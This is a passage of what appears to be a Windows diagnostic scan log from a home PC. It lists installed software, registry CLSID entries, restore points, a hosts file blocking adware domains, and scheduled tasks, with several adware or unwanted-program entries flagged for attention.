PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
Philips SPC230NC Webcam (HKLM-x32\...\{52480FEE-7C32-47B7-95BF-D24374FBB54C}) (Version: 1.0.0.0 - Philips)
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.6904 - CyberLink Corp.) Hidden
PictureMover (HKLM-x32\...\{264FE20A-757B-492a-B0C3-4009E2997D8A}) (Version: 3.5.0.28 - Hewlett-Packard Company)
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
Playalot Games (HKLM-x32\...\{3A3532ED-A121-4297-AA4F-70B60E4BD631}) (Version: 1.0.0 - W3i, LLC)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Pogo Games (HKLM-x32\...\PogoDGC) (Version: 1.0 - ) <==== ATTENTION
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4022 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4022 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.2906 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.2906 - CyberLink Corp.) Hidden
PressReader (HKLM-x32\...\{912CED74-88D3-4C5B-ACB0-13231864975D}) (Version: 5.10.621.0 - NewspaperDirect Inc.)
Protected Toolbar for IE (HKLM-x32\...\IECT3309762) (Version: 6.17.2.8 - Protected)
QuickShare (HKLM-x32\...\{11D4FAA0-A577-4FA8-B24E-D24283D861D1}) (Version: 11.24.60.15709 - Linkury Inc.) <==== ATTENTION
QuickTime 7 (HKLM-x32\...\{627FFC10-CE0A-497F-BA2B-208CAC638010}) (Version: 7.77.80.95 - Apple Inc.)
Ralink 802.11n Wireless LAN Card (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 3.2.13.0 - Ralink)
Raptr (HKLM-x32\...\Raptr) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Reason Core Security (HKLM-x32\...\Reason Core Security) (Version: 1.1.0.0 - Reason Software Company Inc.)
Recovery Manager (x32 Version: 5.5.2926 - CyberLink Corp.) Hidden
Safari (HKLM-x32\...\{FA4C2D53-205F-4245-9717-F3761154824D}) (Version: 5.34.57.2 - Apple Inc.)
Service Pack 1 for SQL Server 2012 (KB2674319) (64-bit) (HKLM\...\KB2674319) (Version: 11.1.3000.0 - Microsoft Corporation)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Sid Meier's Civilization 4 Complete (HKLM-x32\...\{30D1F3D2-54CF-481D-A005-F94B0E98FEEC}) (Version: 1.74 - Firaxis Games)
Sid Meier's Civilization IV Colonization (HKLM-x32\...\{EF36A836-BF89-4A4F-B079-057B0C68C1E0}) (Version: 1.00 - Firaxis Games)
Sid Meier's Civilization V (HKLM-x32\...\Civilization V) (Version: - 2K Games, Inc.)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
SketchUp 2015 (HKLM\...\{350488A4-1540-4103-8F01-B27503891EB0}) (Version: 15.3.331 - Trimble Navigation Limited)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.6 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.6.105 - Skype Technologies S.A.)
Spinco Download Manager (HKLM-x32\...\{704C2901-0E9C-4E4B-862B-2001DACA314B}) (Version: 1.0.0 - Spinco)
Spotify (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Spotify) (Version: 0.8.2.610.g090a06f8 - Spotify AB)
SQL Server 2012 Client Tools (Version: 11.1.3000.0 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (Version: 11.1.3000.0 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (Version: 11.1.3000.0 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
System Checkup 3.5 (HKLM-x32\...\{4AC7B4E7-59B7-4E48-A60D-263C486FC33A}_is1) (Version: 3.5.0.23 - iolo technologies, LLC)
TelevisionFanatic (HKLM-x32\...\TelevisionFanaticbar Uninstall) (Version: - TelevisionFanatic)
The Price is Right 2010 Edition(TM) (HKLM-x32\...\am-thepriceisright2010editiontm) (Version: - )
TidyNetwork.com (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\TidyNetwork.com) (Version: - TidyNetwork.com)
Tom Clancy's EndWar (HKLM-x32\...\{7C3D8108-8D99-427F-A1C2-D8E0D25A469C}) (Version: 1.00.0000 - Ubisoft)
Trainz: Engineer's Edition (HKLM-x32\...\AuranTS2009_is1) (Version: - Auran)
TweakBit Driver Updater (HKLM-x32\...\{62D64B30-6E10-4C49-95FE-EDD8F8165DED}_is1) (Version: 1.6.9.5 - Auslogics Labs Pty Ltd)
TweakBit Speedtest Optimizer (HKLM-x32\...\{BF32D91B-C96C-4DEC-9ADE-7E37FCB40145}_is1) (Version: 1.0.2.2 - Auslogics Labs Pty Ltd)
Unit Layers (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Unit Layers) (Version: 9.0 - Unit Layers)
Unity Web Player (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Updater By SweetPacks 2.0.0.586 (HKLM\...\{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}_is1) (Version: 2.0.0.586 - SweetPacks) <==== ATTENTION
uPlayer (HKLM-x32\...\{06810DC6-3501-40FE-BCB3-1A7BE6398A36}) (Version: 1.0.0 - Full Spectrum Interactive)
VAFPlayer (HKLM-x32\...\{EBE677C0-CBCB-4EBF-8098-E27E1B5271CF}) (Version: 1.6.8 - Tuguu SL) <==== ATTENTION
Verizon High Speed Internet (HKLM-x32\...\Verizon High Speed Internet_is1) (Version: - Verizon)
Video Converter (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Video Converter) (Version: - )
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.95 - WildTangent) Hidden
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
Vz In Home Agent (HKLM-x32\...\{68C063CF-FF7D-49F3-AE93-ED0DA0EAE214}) (Version: 7.06.04 - Verizon)
WeatherBug® (HKLM-x32\...\WeatherBug®) (Version: 10.0.7.4 - Earth Networks, Inc.)
Web Games Player Plugin (HKLM-x32\...\Web Games Player Plugin) (Version: - Zylom Games)
WestwoodChat (HKLM-x32\...\{7CAE6A67-AF7B-4A6A-8705-8AFACA45BB60}) (Version: 1.0.0.0 - WestwoodChat)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.11.9 - WildTangent) Hidden
WildTangent Games App for HP (x32 Version: 4.0.11.9 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Wizard101 (HKLM-x32\...\{A9E27FF5-6294-46A8-B8FD-77B1DECA3021}) (Version: 1.0.0 - KingsIsle Entertainment, Inc.)
Women’s Murder Club Twice in a Blue Moon (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-117579150}) (Version: - Oberon Media)
Yahoo! Axis (HKLM-x32\...\Yahoo! NanoClient) (Version: - Yahoo!)
Yahoo! BrowserPlus 2.9.8 (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Yahoo! BrowserPlus) (Version: - Yahoo! Inc.)
Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version: - )
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version: - Yahoo! Inc.)
Zinio Reader 4 (HKLM-x32\...\ZinioReader4.9310D8F796442B71068C511E15D70529A702D19D.1) (Version: 4.0.2811 - Zinio LLC)
Zinio Reader 4 (x32 Version: 4.0.2811 - Zinio LLC) Hidden
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}\InprocServer32 -> C:\PROGRA~2\APPGRA~1\APPGRA~2.DLL No File
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Ken Terry\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{CC99A798-FD3D-4AB4-969E-6071612524F9}\InprocServer32 -> C:\PROGRA~2\APPGRA~1\APPGRA~2.DLL No File
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll (Dropbox, Inc.)

==================== Restore Points =========================

18-08-2015 19:41:37 Windows Modules Installer
20-08-2015 12:36:50 Intel Driver Update Utility
06-09-2015 07:42:41 Windows Update
06-09-2015 07:43:15 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2015-09-17 07:49 - 00001993 ____A C:\WINDOWS\system32\Drivers\etc\hosts
0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
0.0.0.0 media.opencandy.com
0.0.0.0 cdn.opencandy.com
0.0.0.0 tracking.opencandy.com
0.0.0.0 api.opencandy.com
0.0.0.0 installer.betterinstaller.com
0.0.0.0 installer.filebulldog.com
0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
0.0.0.0 inno.bisrv.com
0.0.0.0 nsis.bisrv.com
0.0.0.0 cdn.file2desktop.com
0.0.0.0 cdn.goateastcach.us
0.0.0.0 cdn.guttastatdk.us
0.0.0.0 cdn.inskinmedia.com
0.0.0.0 cdn.insta.oibundles2.com
0.0.0.0 cdn.insta.playbryte.com
0.0.0.0 cdn.llogetfastcach.us
0.0.0.0 cdn.montiera.com
0.0.0.0 cdn.msdwnld.com
0.0.0.0 cdn.mypcbackup.com
0.0.0.0 cdn.ppdownload.com
0.0.0.0 cdn.riceateastcach.us
0.0.0.0 cdn.shyapotato.us
0.0.0.0 cdn.solimba.com
0.0.0.0 cdn.tuto4pc.com
0.0.0.0 cdn.appround.biz
0.0.0.0 cdn.bigspeedpro.com
0.0.0.0 cdn.bispd.com

There are 4 more lines.


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019FAEB9-DE73-4325-B2EF-1FB94C02797F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_CN36P1C24C => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-07-31] (Hewlett-Packard)
Task: {0575BE02-A6EE-442D-84BA-6E466B1ADDA4} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\SymErr.exe [2015-05-19] (Symantec Corporation)
Task: {0614E216-9586-4DC9-9417-9663E71FFA81} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {0735030B-ACB7-461E-9BE5-57D90FBDD44F} - System32\Tasks\ServicePlan => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {082D6E95-F773-4356-9836-A3BC99BE6316} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-07-31] (Hewlett-Packard)
Task: {09DD22EA-249F-4834-94E9-2F324E944E0D} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {0A3D5C40-0D8C-4838-B27B-2FB17CDD725A} - System32\Tasks\ReasonSecurityScheduledScan => C:\Program Files\Reason\Security\rsUI.exe [2015-08-12] (Reason Software Company Inc.)
Task: {0DEEEEC8-981B-4F62-A548-60F43BA51A88} - System32\Tasks\{AC04BF1E-4705-426E-A81A-68766D098983} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {0E8551ED-005D-40C6-90E3-80D5843F8DBB} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {0F4CE965-6DC4-4AD4-B1A7-3777DD1E4B3C} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-05-02] (Facebook Inc.)
Task: {14CD790F-1920-4695-A6DD-63F34E12CBE6} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\Pogo Games\PogoDGC.exe [2012-09-06] (iWin Inc.)
Task: {1AFD0B96-A1C4-4390-8DCC-F0DCA1AA1D38} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {1F311A34-0681-4CD1-9D84-BC11BA8A3C91} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {252D80EC-5538-4573-A055-6E1D3A694018} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {274C79CE-8EC2-43EC-8A18-CFB2D009B0C5} - System32\Tasks\{0B5CA40B-CCD8-490F-8D68-7EA32D64D307} => Chrome.exe Download Skype for Desktop
Task: {27C411B7-E322-486B-938E-48EF225CFC07} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {2F0B2903-9F5B-4E96-8394-51698C1980DD} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {348C90BE-EEA1-41F3-B6A0-41F1316471C2} - System32\Tasks\{C03B42C0-562C-4C8E-ABB1-BCC55840222D} => pcalua.exe -a "C:\Program Files (x86)\RealArcade\Installer\bin\gameinstaller.exe" -d "C:\Users\Ken Terry\Desktop" -c "C:\Program Files (x86)\RealArcade\Installer\bin\..\installerMain.clf" "C:\Users\Ken Terry\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UWX1MMZ4\gameInitializer.rgi"
Task: {3691FF85-D708-409B-BE7A-284ADA2BCFB2} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {392AAB2B-15F7-48B1-B07E-0BE480D834F6} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {39CE9E03-E817-4DD0-A0E5-3D48949A016E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {4174D0B1-D662-4442-BE05-E74FDA7AB687} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {41CDA214-FD3D-49F2-838B-D6E355FCD0C7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {42CB8764-2045-4238-A56E-751CB98D902F} - System32\Tasks\{C1A4BDAD-939C-43EF-907F-28334BD79BB7} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {46995030-ECAB-4DB8-B941-51CDCEA684EE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {48B91E1C-EA75-45BE-8543-753C2C55D001} - System32\Tasks\{3965E5E4-5DC0-480F-8941-5B8FADC1F1BF} => pcalua.exe -a "C:\Users\Ken Terry\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ML6YDOY\clipart.exe" -d "C:\Users\Ken Terry\Desktop"
Task: {4A5DF7C8-D78A-4D9F-BBE7-2944B2FAC8A9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {5A11E9D0-9BEF-4039-B3A7-C4F415E22876} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {5A56BD5D-7692-4DC3-A70A-EBEDF8E70875} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {5CCAC33B-323F-456B-A658-29D10B7A2BC9} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-05-02] (Facebook Inc.)
Task: {602633A2-45A9-4907-99A7-8F427E57141A} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-21] (Dropbox, Inc.)
Task: {622B0FEF-744E-41A0-90BD-F6289575A86B} - System32\Tasks\{D77C141C-EED4-4EF9-AE1C-B317422E4B19} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {63E6FC54-C7B5-4E4D-8B46-192851267E4A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {657F89F4-A0B0-4D32-9C0C-74B49E7AF41C} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {66326039-7E18-4663-9D67-5428B639B0B9} - System32\Tasks\HPCustParticipation HP Officejet 6700 => C:\Program Files\HP\HP Officejet 6700\Bin\HPCustPartic.exe [2011-09-09] (Hewlett-Packard Co.)
Task: {67C7EE72-2933-4355-BC62-62A7EC038E3F} - System32\Tasks\BackgroundContainer Startup Task => Rundll32.exe "C:\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun <==== ATTENTION
Task: {70C1C77B-1029-4321-922D-34762534CCC2} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\WSCStub.exe [2015-07-16] (Symantec Corporation)
Task: {732DD6B7-9D18-41FD-AF3F-FFA23A1C32E7} - System32\Tasks\G2MUpdateTask-S-1-5-21-2815594105-2774959023-4293743994-1001 => C:\Users\Ken Terry\AppData\Local\Citrix\GoToMeeting\2553\g2mupdate.exe [2015-04-13] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {75E207A5-0575-446A-974A-D178024369F1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {76CFB17D-5351-43AA-9A4A-42D3AE0F1E9D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {7B0DFFF0-6088-41CF-A75A-878BA845C91F} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {7D35A36F-9B86-4332-8951-17F092240E55} - System32\Tasks\AVG\PC Tuneup\Integrator\Start On Ken Terry Logon => C:\Program Files (x86)\AVG\AVG PC Tuneup\BoostSpeed.exe [2011-11-03] (AVG)
Task: {7EC4AA3B-22D1-4CF4-AECB-10E91C4B3D7C} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {8465E2C1-36AD-4EA3-8ECA-5C561635B621} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {88220C49-B2D1-499A-88AC-C3F337621C63} - System32\Tasks\HPOSIAPP64 => C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe [2009-02-27] ()
Task: {88C36CB1-AC36-484B-9A22-08384DDEB631} - System32\Tasks\{C98CDA24-32EA-40BA-80F3-F3E87214F500} => C:\Program Files\Microprose\Test of Time\civ2.exe
Task: {8C7A34A2-0D24-43CE-8C4C-7090004B739A} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {8CD95DE2-BD63-4247-9709-C85F879B4E47} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8FB2F090-2E3A-4FED-B924-7E5CB5A1A9F1} - System32\Tasks\TweakBit\Driver Updater\Start Driver Updater оn logon => C:\Program Files (x86)\TweakBit\Driver Updater\DriverUpdater.exe [2015-06-02] (TweakBit) <==== ATTENTION
Task: {93B6FCD1-E1C2-4515-93B7-00E6823F9CDB} - System32\Tasks\TidyNetwork Update => C:\Users\Ken Terry\AppData\Local\TidyNetwork.com\tidy2update.exe
Task: {95D7899D-9F6E-4E00-9DA9-28752154DC13} - System32\Tasks\ReasonSecurityStart => C:\Program Files\Reason\Security\rsUI.exe [2015-08-12] (Reason Software Company Inc.)
Task: {9D68AD1A-3850-45B6-BC03-009D74EB709E} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {9EC1E636-54B5-4327-8358-8B19E18D1D43} - System32\Tasks\{CB605BE0-B948-4F3E-8FEF-C445F5C182DE} => pcalua.exe -a "C:\Users\Ken Terry\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UWX1MMZ4\jre-6u26-windows-i586-iftw.exe" -d "C:\Users\Ken Terry\Desktop"
Task: {A1D35F98-7D4F-4EC2-9239-00601DC46FCE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {A489B528-91C6-4184-A0AF-723508AC6495} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {A49D85A9-EDF9-405B-A799-CAB721A8BEEB} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => C:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {A894259E-D7D0-41BB-AED3-1D8F66401E39} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {AA9C9B64-9F27-40AB-8513-751DA031862B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {AAF270E4-3BE6-42B0-8B71-A03C29CE37EF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {B10439E1-E185-4DB2-807B-DD6AC98B530E} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {B2B193B4-584E-465F-A3A0-B9EEB0B8F7E7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {B51CE0AA-CA24-45B7-9CE0-C71EC9667F2D} - System32\Tasks\iolo System Checkup => C:\ProgramData\iolo\scustask.lnk [2015-04-10] ()
Task: {B86B0DB9-4A6D-4063-8CAA-F4A9DD92C215} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_CN2CC9SMG4 => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-07-31] (Hewlett-Packard)
Task: {B92A5C1F-2083-497F-B44F-60F380623673} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {BC4811CC-DF0C-4AB6-8CE8-B92779D9F7E9} - System32\Tasks\Scheduled Update for Ask Toolbar => C:\Program Files (x86)\Ask.com\UpdateTask.exe <==== ATTENTION
Task: {C20C6816-47C2-4AB4-B52A-C61D3A10D348} - System32\Tasks\TweakBit\Speedtest Optimizer\Start Speedtest Optimizer оn logon => C:\Program Files (x86)\TweakBit\Speedtest Optimizer\SpeedtestOptimizer.exe [2015-08-26] (TweakBit) <==== ATTENTION
Task: {C4D5D3CC-58F8-43D2-AC4F-FA91F4439F57} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {CFABD2B9-4772-4521-9405-76C50451DAEB} - System32\Tasks\HPCeeScheduleForKen Terry => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
